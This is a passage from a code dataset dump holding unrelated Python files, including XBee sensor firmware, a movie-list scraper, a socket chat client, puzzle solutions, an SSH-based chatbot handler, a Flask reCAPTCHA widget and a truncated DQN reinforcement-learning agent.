Pin.PULL_DOWN)\nmoisture_sensor_power = Pin(\"P5\", Pin.OUT)\ntilt_power = Pin(\"P6\", Pin.OUT) # XCTU Sets this pin Pin.OUT & Pin.Pull_UP for DC Tilt_Switch_Power\nPin(\"P7\", Pin.OUT)\nPin(\"P8\", Pin.OUT)\nPin(\"P9\", Pin.OUT)\n\niteration = 0 # Iteration is used to count number of samples before a packet is sent\nlight_average = 0 # A running total for the average light (Low numbers imply bright)\nmoisture_average = 0 # A running total for the average moisture (Low numbers imply dry)\nbattery = 0 # Battery readings are kept between iterations of the loop for evaluation\nambiance = 0 # Light readings are also kept between loop iterations for evaluation\n\nwhile True:\n # Aggregate data\n tilt_power.on()\n time.sleep_ms(10)\n print(\"PreTilt\"+str(tilt_switch.value()))\n if tilt_switch.value():\n sw_bit_0 = Pin(\"P0\", Pin.IN, Pin.PULL_DOWN)\n sw_bit_1 = Pin(\"P1\", Pin.IN, Pin.PULL_DOWN)\n\n # Evaluate current iteration number\n iteration += 1\n print(iteration)\n if iteration > AVERAGE_SAMPLES:\n moisture = moisture_average / AVERAGE_SAMPLES\n ambiance = light_average / AVERAGE_SAMPLES\n\n # Zero out iteration and running average variables\n iteration = 0\n moisture_average = 0\n light_average = 0\n\n # Evaluate voltage of power supply rail\n battery = xbee.atcmd(\"%V\")\n switch = tilt_switch.value()\n # Evaluate dip switch positions\n zone = 0x3 & (sw_bit_1.value() << 1) | (sw_bit_0.value())\n\n try:\n print(\"Sector: \" + str(zone) +\n \"\\nMoisture: \" + str(moisture) +\n \"\\nSunlight: \" + str(ambiance) +\n \"\\nBattery: \" + str(battery) +\n \"\\nTilt: \" + str(switch) +\n \"\\n\")\n xbee.transmit(xbee.ADDR_COORDINATOR,\n (\"{'Sector': \" + str(zone) +\n \", 'Moisture': \" + str(moisture) +\n \", 'Sunlight': \" + str(ambiance) +\n \", 'Battery': \" + str(battery) +\n \", 'Tilt': \" + str(switch) +\n \"}\")\n )\n except Exception as err:\n print(err)\n else:\n print(\"else\")\n # Read data from moisture probe\n moisture_sensor_power.on()\n time.sleep_ms(100)\n moisture_average += moisture_probe.read()\n moisture_sensor_power.off()\n\n # Evaluate ambient light in area\n light_average += light_sensor.read()\n\n sw_bit_0 = Pin(\"P0\", Pin.OUT)\n sw_bit_1 = Pin(\"P1\", Pin.OUT)\n\n # Sleep duration evaluation\n sleep = SLEEP_DURATION\n if ambiance < LOW_LIGHT_THRESH or battery < LOW_VOLT_THRESH:\n sleep = SLEEP_DURATION * SLEEP_MULTIPLIER\n print(sleep)\n # Deep sleep or wait if sleep switch is closed\n tilt_switch = Pin(\"D8\", Pin.OUT)\n if sleep_enable.value():\n sleep_enable = Pin(\"P2\", Pin.OUT)\n xbee.XBee().sleep_now(sleep, pin_wake=False)\n print(\"postWhileConn\")\n while xbee.atcmd(\"AI\") != 0:\n time.sleep_ms(100)\n print(\"postWhileConn\")\n sleep_enable = Pin(\"P2\", Pin.IN, Pin.PULL_DOWN)\n\n else:\n sleep_enable = Pin(\"P2\", Pin.OUT)\n time.sleep_ms(sleep)\n print(\"postWhileConn\")\n while xbee.atcmd(\"AI\") != 0:\n time.sleep_ms(100)\n print(\"postWhileConn\")\n sleep_enable = Pin(\"P2\", Pin.IN, Pin.PULL_DOWN)\n tilt_switch = Pin(\"D8\", Pin.IN, Pin.PULL_DOWN)\n","sub_path":"Garbage_Examples/Xbee3/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5469,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"1028788","text":"import numpy as np\nfrom torch.utils.tensorboard import SummaryWriter\n\n\n# データを作る\nnp.random.seed(123)\nx = np.random.randn(100)\ny = x.cumsum() # xの累積和\n\n# ここではmatplotlib での以下に相当するものをTensorBoard で表示します。\n# t = np.arange(100)\n# plt.plot(t, x)\n# plt.plot(t, y)\n\n# log_dirでlogのディレクトリを指定\nwriter = SummaryWriter(log_dir=\"./logs\")\n\n# xとyの値を記録していく\nfor i in range(100):\n writer.add_scalar(\"x\", x[i], i)\n writer.add_scalar(\"y\", y[i], i)\n\n# writerを閉じる\n# writer.flush()\nwriter.close()","sub_path":"src/test_torch2board.py","file_name":"test_torch2board.py","file_ext":"py","file_size_in_byte":590,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"267449055","text":"import requests\nfrom bs4 import BeautifulSoup\nnum = 1\nfor i in range(10):\n url = f\"https://movie.douban.com/top250?start={i*25}&filter=\"\n print(url)\n res = requests.get(url)\n soup = BeautifulSoup(res.text,'html.parser')\n list_movie = soup.find_all('div',class_=\"item\")\n\n for movies in list_movie:\n \n \n movie = movies.find('a')\n movie_rating_num = movies.find('span',class_=\"rating_num\").text\n movie_name = movies.find('span',class_=\"title\").text\n movie_href=movie['href']\n strs = '\\n序号:'+str(num) + '\\n电影名:'+movie_name+'\\n电影链接:'+movie_href+'\\n电影评分'+movie_rating_num\n with open('movies_list.txt','a',encoding='utf-8') as f:\n f.write(strs)\n f.close()\n print(strs)\n num=num+1\n \n \n","sub_path":"Spider3_1.py","file_name":"Spider3_1.py","file_ext":"py","file_size_in_byte":832,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"136619540","text":"from socket import *\r\nfrom _thread import *\r\n# Creating a clientsocket\r\n\r\n# Variables\r\nHOST = 'localhost' # Direccion IP del servidor\r\nPORT = 50010\r\nserver = (HOST, PORT)\r\n\r\n# Crear el socket\r\nsock = socket(AF_INET, SOCK_STREAM)\r\n\r\n# Establecer coneccion\r\nsock.connect(server)\r\n\r\ndef get_ip():\r\n s = socket(AF_INET, SOCK_DGRAM)\r\n try:\r\n s.connect(('10.255.255.255', 1))\r\n IP = s.getsockname()[0]\r\n except:\r\n IP = '127.0.0.1'\r\n finally:\r\n s.close()\r\n return IP\r\n\r\ndef reciver():\r\n reply = sock.recv(1024)\r\n print (\"Recivido: \\n\", repr(reply.decode()))\r\n\r\n\r\ndef sender():\r\n message = input(\"Mensaje: \")\r\n message = get_ip() + ': ' + message+ '\\n'\r\n sock.send(message.encode())\r\n \r\n\r\n# Comunicacion\r\nwhile True:\r\n start_new_thread(sender,())\r\n start_new_thread(reciver,())\r\n\r\n# Cerrar coneccion\r\nsock.close()\r\n","sub_path":"Chat entre clientes y un servidor localhost/clientSocket.py","file_name":"clientSocket.py","file_ext":"py","file_size_in_byte":875,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"154187211","text":"#!/bin/python3\n\n\"\"\"\nAuthor: Jeremy Barenholtz\n\nHackerrank ProjectEuler+ Challenge: \nProject Euler #9: Special Pythagorean Triplet\n\"\"\"\n\nimport math\nimport sys\n\n\ndef main():\n squares = [i**2 for i in range(0, 1500)]\n\n t = int(input().strip())\n for a0 in range(t):\n n = int(input().strip())\n print(find_max_triplet(squares, n))\n\n\ndef find_max_triplet(squares: list, n: int) -> int:\n triplets_product = []\n for i in range(1, len(squares)):\n for j in range(i, len(squares)):\n k = math.sqrt(squares[i] + squares[j])\n val = i + j + k\n\n if val > n:\n break;\n\n if val == n:\n triplets_product.append(i*j*k)\n break;\n\n if not triplets_product:\n return -1\n return int(max(triplets_product))\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"ProjectEuler+/Python/p9_special_pythagorean_triplet.py","file_name":"p9_special_pythagorean_triplet.py","file_ext":"py","file_size_in_byte":855,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"445117827","text":"\nS = [1,2,3,4,5,6,7,8]\nK = 5\nvalue = list()\nresult = list()\ncount = 8\nwhile count > 0:\n\tA = S[count-1]\n\tfor i in range(0,8):\n\t\tif A < S[i]:\n\t\t\tvalue.append(A & S[i])\n\tcount -= 1\nfor i in range(0, len(value)):\n\tif value[i] < K:\n\t\tresult.append(value[i])\n\nprint(max(result))\n\nprint(value)","sub_path":"hackerankSolved/day29BitwiseAnd.py","file_name":"day29BitwiseAnd.py","file_ext":"py","file_size_in_byte":286,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"551550098","text":"import json\nimport math\nimport operator\nfrom collections import defaultdict\n\n\nclass testing():\n #score structure:\n #{ 'apple': {'politics': {'politics':score, 'business':score, 'entertainment':score},\n # 'business': {'politics':score, 'business':score, 'entertainment':score},\n # 'entertainment': {'politics':score, 'business':score, 'entertainment':score}\n # },\n # 'facebook': {'politics': {'politics':score, 'business':score, 'entertainment':score},\n # 'business': {'politics':score, 'business':score, 'entertainment':score},\n # 'entertainment': {'politics':score, 'business':score, 'entertainment':score}\n # },\n # ....\n #}\n \n #class_tag structure:\n #{ 'apple': {'politics': tag, 'business': tag, 'entertainment':tag },\n # 'facebook': {'politics': tag, 'business': tag, 'entertainment':tag },\n # ....\n #}\n \n def naiveBayesTesting(self, classNames, trainingDict, testingDict):\n score = defaultdict ( lambda: defaultdict( dict ) )\n for queryname in testingDict.keys():\n for trueclass in classNames:\n for classname in classNames:\n score[queryname][trueclass][classname] = math.log(trainingDict[classname]['class_prob'], 2)\n for word in testingDict[queryname][classname]:\n if word in trainingDict[classname]['word_prob']:\n score[queryname][trueclass][classname] += math.log(trainingDict[classname]['word_prob'][word],2)\n class_tag = defaultdict ( lambda: defaultdict( float ) )\n for query in score.keys():\n for trueclass in score[query].keys():\n maxClass = max(score[query][trueclass].iteritems(), key=operator.itemgetter(1))[0]\n class_tag[query][trueclass] = maxClass\n \n return score, class_tag\n \n \n #category_dict structure:\n #{'apple':{'politics':[...,...,...],\n # 'business':[...,...,...],\n # 'entertainment':[...,...,...]\n # }\n # 'facebook':{'politics':[...,...,...],\n # 'business':[...,...,...],\n # 'entertainment':[...,...,...]\n # }\n # ...\n #}\n \n \n def extractVocabulary(self, rootPath, classname, testingQueries, stopWordList):\n class_tokens = defaultdict(list)\n for queryname in testingQueries:\n fileName = rootPath + classname + '\\\\' + queryname + '.json'\n f = open(fileName, 'r')\n for line in f.readlines():\n result = json.loads(line.strip('\\n'))\n text = result['description']\n for word in text.split():\n class_tokens[queryname].append(word)\n return class_tokens\n \n def buildTestDict(self, rootPath , classNames, testingQueries, stopWordList):\n testDict = defaultdict (defaultdict)\n for classname in classNames:\n class_tokens = self.extractVocabulary(rootPath, classname, testingQueries, stopWordList)\n for query in testingQueries:\n testDict[query][classname] = class_tokens[query] \n \n return testDict\n \n ","sub_path":"HW3/src/HW3/testing.py","file_name":"testing.py","file_ext":"py","file_size_in_byte":3252,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"170565276","text":"import json\nfrom Titan.handler_interface import *\n\nfrom Titan.sshclient import SshClient\n\n\nclass HandlerServerManager(HandlerInterface):\n def __init__(self):\n self.context_host = \"HandlerServerManager_host_ctx\"\n self.context_un = \"HandlerServerManager_un_ctx\"\n self.context_pw = \"HandlerServerManager_pw_ctx\"\n self.context_client = \"HandlerServerManager_client_ctx\"\n\n self.verbs = [\"start\", \"stop\" , \"restart\"]\n\n with open(\"sshcommands.json\") as sshcmd_file:\n self.sshcmd_dict = json.load(sshcmd_file)\n sshcmd_file.close()\n with open(\"sshcommands0.json\") as sshcmd0_file:\n self.sshcmd0_dict = json.load(sshcmd0_file)\n sshcmd0_file.close()\n\n def handle(self, message_unit):\n msg=message_unit.get_message().lower()\n ssh_client_instance = message_unit.get_context(self.context_client)\n if msg.startswith(\"cred\"):\n words=msg.split()\n message_unit.set_context(self.context_host, words[1])\n message_unit.set_context(self.context_un, words[2])\n message_unit.set_context(self.context_pw, words[3])\n ssh_client = SshClient()\n ssh_client.connect(words[1], words[2], words[3])\n message_unit.set_context(self.context_client, ssh_client)\n prev_mu = message_unit.get_previous_mu()\n if message_unit.check_context(self.context_host):\n return self.handle(prev_mu)\n return Drop\n\n if \"running\" in msg:\n for entry in self.sshcmd_dict: #check if running\n if entry in msg:\n command = \"controlcenter.sh list | grep -i \" + '\"' + entry + '\"'\n if ssh_client_instance is None:\n return \"Please provide your server details and try again.\"\n return ssh_client_instance.exec(command)\n\n for entry in self.sshcmd0_dict: #run these commands as it is\n if entry in msg:\n print(\"sm checking for \"+entry)\n if ssh_client_instance is None:\n return \"Please provide your server details and try again.\"\n return ssh_client_instance.exec(self.sshcmd0_dict.get(entry))\n\n for verb in self.verbs: #start/restart/stop services\n if verb in msg:\n for entry in self.sshcmd_dict:\n if entry in msg:\n print(\"match found\")\n command = self.sshcmd_dict.get(entry) + \" \" + verb\n print(\"executing \" + command)\n if ssh_client_instance is None:\n return \"Please provide your server details and try again.\"\n return ssh_client_instance.exec(command)\n\n\n print(\"server manager passing\")\n return Pass\n\n def get_source(self):\n return \"I've run the command on the server.\"\n\n\n","sub_path":"Titan/handler_server_manager.py","file_name":"handler_server_manager.py","file_ext":"py","file_size_in_byte":2968,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"129023974","text":"# -*- coding: utf-8 -*-\n\nfrom flask import current_app, Markup\nfrom werkzeug import url_encode\nfrom flask import json\nfrom .._compat import text_type\nJSONEncoder = json.JSONEncoder\n\ntry:\n from speaklater import _LazyString\n\n class _JSONEncoder(JSONEncoder):\n def default(self, o):\n if isinstance(o, _LazyString):\n return str(o)\n return JSONEncoder.default(self, o)\nexcept:\n _JSONEncoder = JSONEncoder\n\n\nRECAPTCHA_API_SERVER = '//www.google.com/recaptcha/api/'\nRECAPTCHA_HTML = u'''\n\n\n\n'''\n\n__all__ = [\"RecaptchaWidget\"]\n\n\nclass RecaptchaWidget(object):\n\n def recaptcha_html(self, query, options):\n html = current_app.config.get('RECAPTCHA_HTML', RECAPTCHA_HTML)\n server = current_app.config.get(\n 'RECAPTCHA_API_SERVER', RECAPTCHA_API_SERVER\n )\n return Markup(html % dict(\n script_url='%schallenge?%s' % (server, query),\n frame_url='%snoscript?%s' % (server, query),\n options=json.dumps(options, cls=_JSONEncoder)\n ))\n\n def __call__(self, field, error=None, **kwargs):\n \"\"\"Returns the recaptcha input HTML.\"\"\"\n\n try:\n public_key = current_app.config['RECAPTCHA_PUBLIC_KEY']\n except KeyError:\n raise RuntimeError(\"RECAPTCHA_PUBLIC_KEY config not set\")\n query_options = dict(k=public_key)\n\n if field.recaptcha_error is not None:\n query_options['error'] = text_type(field.recaptcha_error)\n\n query = url_encode(query_options)\n\n _ = field.gettext\n\n options = {\n 'theme': 'clean',\n 'custom_translations': {\n 'audio_challenge': _('Get an audio challenge'),\n 'cant_hear_this': _('Download sound as MP3'),\n 'help_btn': _('Help'),\n 'image_alt_text': _('reCAPTCHA challenge image'),\n 'incorrect_try_again': _('Incorrect. Try again.'),\n 'instructions_audio': _('Type what you hear'),\n 'instructions_visual': _('Type the text'),\n 'play_again': _('Play sound again'),\n 'privacy_and_terms': _('Privacy & Terms'),\n 'refresh_btn': _('Get a new challenge'),\n 'visual_challenge': _('Get a visual challenge'),\n }\n }\n\n options.update(current_app.config.get('RECAPTCHA_OPTIONS', {}))\n\n return self.recaptcha_html(query, options)\n","sub_path":"flask/Lib/site-packages/flask_wtf/recaptcha/widgets.py","file_name":"widgets.py","file_ext":"py","file_size_in_byte":2853,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"8884325","text":"import random\n\n\nclass attribute():\n def __init__(self, name, level, max):\n self.name = name\n self.level = level\n self.hp = max\n self.max = max\n\n\nclass Hero(attribute):\n def __init__(self, name, level, max, race):\n super().__init__(name, level, max)\n self.race = race\n if self.race == 'human':\n self.Dodge = 0.3\n else:\n self.Dodge = 0.6\n\n def hurt(self, Monster):\n s = random.randint(0, self.level * 10)\n Monster.defense(s)\n\n def defense(self, s):\n lm = random.random()\n if lm > self.Dodge:\n self.hp -= s\n if self.hp > 0:\n print(\"Name:{}\\t受到攻击:{}\\tHP:{}\\tLevel:{}\\t\".format(self.name, s, self.hp, self.level))\n else:\n print(\"Name:{}\\t受到攻击:{}\\tHP:0\\t,阵亡!\".format(self.name, s))\n else:\n print(\"Name:{}\\t躲避了攻击\\tHP:{}\\tLevel:{}\\t\".format(self.name, self.hp, self.level))\n\n def upgrade(self):\n self.level += 1\n self.max = self.max + 10\n self.hp = self.max\n print(\"Name:{}\\t获胜!\\tHP:{}\\tLevel:{}\\t\".format(self.name, self.hp, self.level))\n\n\nclass Monster(attribute):\n def __init__(self, name, level, max):\n super().__init__(name, level, max)\n\n def hurt(self, Hero):\n s = random.randint(0, self.level * 10)\n Hero.defense(s)\n\n def defense(self, s):\n self.hp = self.hp - s\n if self.hp > 0:\n print(\"Name:{}\\t受到攻击:{}\\tHP:{}\\tLevel:{}\\t \".format(self.name, s, self.hp, self.level))\n else:\n print(\"Name:{}\\t受到攻击:{}\\tHP:0\\t阵亡!\\t\".format(self.name, s))\n\n\nclass boss(attribute):\n def __init__(self, name, level, max):\n super().__init__(name, level, max)\n self.shield = 3\n\n def hurt(self, Hero):\n s = random.randint(0, self.level * 10)\n Hero.defense(s)\n\n def defense(self, s):\n self.shield -= 2\n if self.shield >= 0:\n print(\"Name:{}\\t受到攻击:{}\\t护盾-1\\t当前护盾:{}点\".format(self.name, s, self.shield))\n else:\n self.hp = self.hp - s\n if self.hp > 0:\n print(\"Name:{}\\t受到攻击:{}\\tHP:{}\\t\".format(self.name, s, self.hp))\n else:\n print(\"Name:{}\\t受到攻击:{}\\tHP:0\\t阵亡!\".format(self.name, s))\n\n\ndef main():\n a = random.random()\n if a >= 0.5:\n hero = Hero(\"人类\", 1, 35, 'human')\n else:\n hero = Hero(\"精灵\", 1, 25, 'spirit')\n m1 = Monster(\"怪兽1\", 1, 30)\n m2 = Monster(\"怪兽2\", 2, 50)\n m3 = boss(\"BOSS\", 3, 80)\n mo = [m1, m2, m3]\n time = 1\n while True:\n print('-' * 15, \"第{}回合\".format(time), '-' * 15)\n hero.hurt(mo[0])\n if mo[0].hp > 0:\n mo[0].hurt(hero)\n else:\n hero.upgrade()\n del mo[0]\n time += 1\n\n if len(mo) == 0:\n print(\"英雄Win!\")\n break\n elif hero.hp <= 0:\n print(\"英雄Lose!\")\n break\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"HW9/Group11/hw9_1720325.py","file_name":"hw9_1720325.py","file_ext":"py","file_size_in_byte":3115,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"3306679","text":"#!/usr/bin/env python3\n\nimport collections\nfrom typing import Deque, List, Union\n\nimport errors\n\n\nAtom = Union[str, int]\nExpression = Union[Atom, List]\n\n\ndef tokenize(source: str) -> Deque[str]:\n spaced = source.replace('(', ' ( ').replace(')', ' ) ')\n return collections.deque(spaced.split())\n\n\ndef parse_atom(token: str) -> Atom:\n if token[0] == '+':\n return token\n try:\n return int(token)\n except ValueError:\n return token\n\n\ndef parse_exp(tokens: Deque[str]) -> Expression:\n head = tokens.popleft()\n if head == '(':\n ast = []\n while tokens and tokens[0] != ')':\n ast.append(parse_exp(tokens))\n if not tokens:\n raise errors.UnexpectedEndOfSource()\n tokens.popleft() # discard ')'\n return ast\n elif head == ')':\n raise errors.UnexpectedCloseParen()\n else:\n return parse_atom(head)\n\n\nif __name__ == '__main__':\n import sys\n print(parse_exp(tokenize(sys.stdin.read())))\n","sub_path":"SubPascal/parser.py","file_name":"parser.py","file_ext":"py","file_size_in_byte":995,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"435663373","text":"import turtle\r\nimport pandas\r\n\r\nscreen = turtle.Screen()\r\nscreen.title(\"states Quiz\")\r\nimage = \"blank_states_img.gif\"\r\nscreen.addshape(image)\r\nturtle.shape(image)\r\n\r\ndata = pandas.read_csv(\"50_states.csv\")\r\n\r\nall_states = data.state.to_list()\r\nguessed_states = []\r\nwhile len(guessed_states) < 28:\r\n\r\n answer_states = screen.textinput(\r\n title=f\"{len(guessed_states)}/50 States Correct\", prompt=\"whats your state\").title()\r\n if answer_states == \"Exit\":\r\n missing_states = []\r\n for state in all_states:\r\n if state not in guessed_states:\r\n missing_states.append(state)\r\n new_data = pandas.DataFrame(missing_states)\r\n new_data.to_csv(\"states_to_learn.csv\")\r\n break\r\n\r\n\r\n if answer_states in all_states:\r\n guessed_states.append(answer_states)\r\n t = turtle.Turtle()\r\n t.hideturtle()\r\n t.penup()\r\n state_data = data[data.state == answer_states]\r\n t.goto(int(state_data.x), int(state_data.y))\r\n t.write(answer_states)\r\n","sub_path":"US game/US_states_quiz.py","file_name":"US_states_quiz.py","file_ext":"py","file_size_in_byte":1037,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"79867743","text":"import sys\nimport random\n\ndef fast_count_segments(starts, ends, points):\n\n cnt = [0] * len(points)\n runningcount = 0\n tempArr = []\n\n for val in starts:\n tempArr.append([val, \"l\"])\n \n for val in ends:\n tempArr.append([val, \"r\"])\n\n for i, val in enumerate(points):\n tempArr.append([val, \"p\", i])\n\n tempArr.sort()\n\n for i in range(len(tempArr)):\n\n obtainVal = tempArr[i][1]\n\n if obtainVal == \"l\":\n runningcount += 1\n elif obtainVal == \"r\":\n runningcount -= 1\n else:\n cnt[tempArr[i][2]] = runningcount\n\n return cnt\n\ndef naive_count_segments(starts, ends, points):\n cnt = [0] * len(points)\n for i in range(len(points)):\n for j in range(len(starts)):\n if starts[j] <= points[i] <= ends[j]:\n cnt[i] += 1\n return cnt\n\n\nif __name__ == \"__main__\":\n input = sys.stdin.read()\n data = list(map(int, input.split()))\n\n\n segments = data[0]\n points = data[1]\n\n starts = data[2:2 * segments + 2:2]\n ends = data[3:2 * segments + 2:2]\n points = data[2 * segments + 2:]\n\n #use fast_count_segments\n #cnt = naive_count_segments(starts, ends, points)\n cnt = fast_count_segments(starts,ends,points)\n \n print(*cnt, sep=' ')\n","sub_path":"OrganiseLottery.py","file_name":"OrganiseLottery.py","file_ext":"py","file_size_in_byte":1290,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"579901251","text":"from sqlalchemy_utils import analyze\nfrom tests import TestCase\n\n\nclass TestAnalyzeWithPostgres(TestCase):\n dns = 'postgres://postgres@localhost/sqlalchemy_utils_test'\n\n def test_runtime(self):\n query = self.session.query(self.Article)\n assert analyze(self.connection, query).runtime\n\n def test_node_types_with_join(self):\n query = (\n self.session.query(self.Article)\n .join(self.Article.category)\n )\n analysis = analyze(self.connection, query)\n assert analysis.node_types == [\n u'Hash Join', u'Seq Scan', u'Hash', u'Seq Scan'\n ]\n\n def test_node_types_with_index_only_scan(self):\n query = (\n self.session.query(self.Article.name)\n .order_by(self.Article.name)\n .limit(10)\n )\n analysis = analyze(self.connection, query)\n assert analysis.node_types == [u'Limit', u'Index Only Scan']\n","sub_path":"tests/functions/test_analyze.py","file_name":"test_analyze.py","file_ext":"py","file_size_in_byte":936,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"223864457","text":"import os, os.path\nimport random\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport time\nimport math\nimport itertools\nimport tensorflow as tf\nfrom collections import deque\nfrom tensorflow.keras.optimizers import Adam\nfrom tensorflow.keras.layers import Dense, Conv1D, MaxPooling1D, Flatten, concatenate, Conv2D, MaxPooling2D\n#config = tf.compat.v1.ConfigProto(device_count={'GPU':1})\n#sess = tf.compat.v1.Session(config=config) \n# CUDA_VISIBLE_DEVICES=\"\"\n\nclass DQN_CNNDNN(tf.keras.Model):\n def __init__(self, state_size, selected_size, remain_size, loading_size, output_size):\n super(DQN_CNNDNN, self).__init__()\n self.case_cnn1 = Conv2D(filters=5, kernel_size=3, activation='relu', padding=\"valid\", input_shape = state_size)\n self.case_dnn1 = Dense(32, activation='relu')\n # location - selected boxes\n self.sel_cnn1 = Conv2D(filters=5, kernel_size=3, activation='relu', padding=\"valid\", input_shape = selected_size)\n self.sel_dnn1 = Dense(32, activation='relu')\n # size - remain boxes\n self.r_cnn1 = Conv2D(filters=8, kernel_size=3, activation='relu', padding=\"valid\", input_shape = remain_size )\n self.r_dnn1 = Dense(64, activation='relu')\n # size - selected boxes\n self.l_cnn1 = Conv2D(filters=5, kernel_size=(1,3), activation='relu', padding=\"valid\", input_shape = loading_size )\n self.l_dnn1 = Dense(32, activation='relu')\n # all\n #n_ch = state_size[-1] + selected_size[-1] + remain_size[-1] + loading_size[-1] \n #self.a_cnn1 = Conv2D(filters=8, kernel_size=3, activation='relu', padding=\"valid\", input_shape = state_size[:-1]+(n_ch,))\n #self.a_cnn1 = Conv2D(filters=8, kernel_size=3, activation='relu', padding=\"valid\")\n #self.a_dnn1 = Dense(32, activation='relu')\n # merge \n self.fc1 = Dense(256, activation='relu')\n self.fc2 = Dense(128, activation='relu')\n if output_size > 1: #DDQN\n self.fc_out = Dense(output_size, activation='softmax')\n else:\n self.fc_out = Dense(output_size)\n\n def call(self, cb_list):\n c, s, r,l = cb_list[0], cb_list[1], cb_list[2], cb_list[3]\n #c, s, r = cb_list[0], cb_list[1], cb_list[2]\n ### case\n c = self.case_cnn1(c)\n c = MaxPooling2D(pool_size=(2, 2))(c)\n c = Flatten()(c)\n c = self.case_dnn1(c)\n ### location - selected boxes\n s = self.sel_cnn1(s)\n s = MaxPooling2D(pool_size=(2, 2))(s)\n s = Flatten()(s)\n s = self.sel_dnn1(s)\n ### size - remain boxes\n r = self.r_cnn1(r)\n r = MaxPooling2D(pool_size=(2, 2))(r)\n r = Flatten()(r)\n r = self.r_dnn1(r)\n ### size - selected boxes\n l = self.l_cnn1(l) #(32, 1, 60, 5)\n l = MaxPooling2D(pool_size=(1, 2))(l)#l = MaxPooling2D(pool_size=(2, 2))(l)\n l = Flatten()(l)\n l = self.l_dnn1(l)\n ### all\n #a = tf.concat([c, r, l], -1)\n #a = self.a_cnn1(a)\n #a = MaxPooling2D(pool_size=(2, 2))(a)\n #a = Flatten()(a)\n #a = self.a_dnn1(a)\n ### merge\n x = concatenate([c,s,r,l])\n x = self.fc1(x)\n x = self.fc2(x)\n q = self.fc_out(x)\n return q \n\nclass DQN_DNN(tf.keras.Model):\n def __init__(self, state_size, selected_size, remain_size, loading_size, output_size):\n super(DQN_DNN, self).__init__()\n # case network\n l1,b1,k1 = state_size # 배치 사이즈 제외된 사이즈\n self.state_size = (l1*b1*k1,)\n self.case_dnn1 = Dense(64, activation='relu',input_shape = self.state_size)\n self.case_dnn2 = Dense(64, activation='relu')#\n # location - selected boxes\n l2,b2,k2 = selected_size\n self.selected_size = (l2*b2*k2,)\n self.sel_dnn1 = Dense(64, activation='relu',input_shape = self.selected_size)\n self.sel_dnn2 = Dense(64, activation='relu')#\n # remain boxes\n l3,b3,k3 = remain_size\n self.remain_size = (l3*b3*k3, )\n self.r_dnn1 = Dense(128, activation='relu', input_shape = self.remain_size )\n self.r_dnn2 = Dense(128, activation='relu')\n # loading boxes - selected boxes\n l4,b4,k4 = loading_size\n self.loading_size = (l4*b4*k4, )\n self.l_dnn1 = Dense(128, activation='relu', input_shape = self.loading_size )\n self.l_dnn2 = Dense(128, activation='relu')\n # all\n #self.all_size = (self.state_size[0]+self.selected_size[0]+self.remain_size[0]+self.loading_size[0], )\n #self.a_dnn1 = Dense(128, activation='relu', input_shape = self.all_size )\n # merge \n self.fc1 = Dense(256, activation='relu')\n self.fc2 = Dense(256, activation='relu')\n self.fc2 = Dense(128, activation='relu')\n self.fc_out = Dense(output_size, activation='softmax')\n if output_size > 1: #DDQN\n self.fc_out = Dense(output_size, activation='softmax')\n else:\n self.fc_out = Dense(output_size)\n\n def call(self, cb_list):\n c, s, r, l = cb_list[0], cb_list[1], cb_list[2], cb_list[3]\n c = tf.reshape(c, [-1, self.state_size[0]])\n s = tf.reshape(s, [-1, self.selected_size[0]])\n r = tf.reshape(r, [-1, self.remain_size[0]])\n l = tf.reshape(l, [-1, self.loading_size[0]])\n #a = tf.concat([c, s, r, l], -1)\n ### case\n c = self.case_dnn1(c)\n c = self.case_dnn2(c)\n ### location - selected boxes\n s = self.sel_dnn1(s)\n s = self.sel_dnn2(s)\n ### remain boxes\n r = self.r_dnn1(r)\n r = self.r_dnn2(r)\n ### loading boxes\n l = self.l_dnn1(l)\n l = self.l_dnn2(l)\n ### all\n #a = self.a_dnn1(a)\n ### merge\n x = concatenate([c,s,r,l])#x = concatenate([c,s,r,l,a])\n x = self.fc1(x)\n x = self.fc2(x)\n q = self.fc_out(x)\n return q\n\n\n\nclass DQNAgent:\n def __init__(self, L=20, B=20, H=20, n_remains = 5, n_loading=3, max_size = 64,\n lr=1e-8, exp_steps=500, train_st = 200, memory_len=500, update_target_rate = 30, net='DNN' ):\n self.state_size = (L, B, 3)\n self.selected_size = (L, B, n_loading)\n self.remain_size = (n_remains, max_size ,2) #(L, B, n_remains)\n self.loading_size = (n_loading, max_size ,2) # (L, B, n_loading)\n self.output_size = 1 #math.factorial(c_boxes_size)\n # hyperparameters\n self.discount_factor = 0.99\n self.learning_rate = lr#1e-8#1e-4\n self.epsilon = 1.\n self.epsilon_start, self.epsilon_end = 1.0, 0.01\n self.exploration_steps = exp_steps\n self.epsilon_decay_step = self.epsilon_start - self.epsilon_end\n self.epsilon_decay_step /= self.exploration_steps\n self.batch_size = 32\n self.train_start = train_st\n self.update_target_rate = update_target_rate\n self.beta = 0.2\n self.memory = deque(maxlen=memory_len) # replay memory\n self.net = net\n self.vmin = 0#-0.02\n self.vmax = 1\n self.nsup = 51#52\n self.dz = (self.vmax - self.vmin)/(self.nsup - 1.)\n self.z = 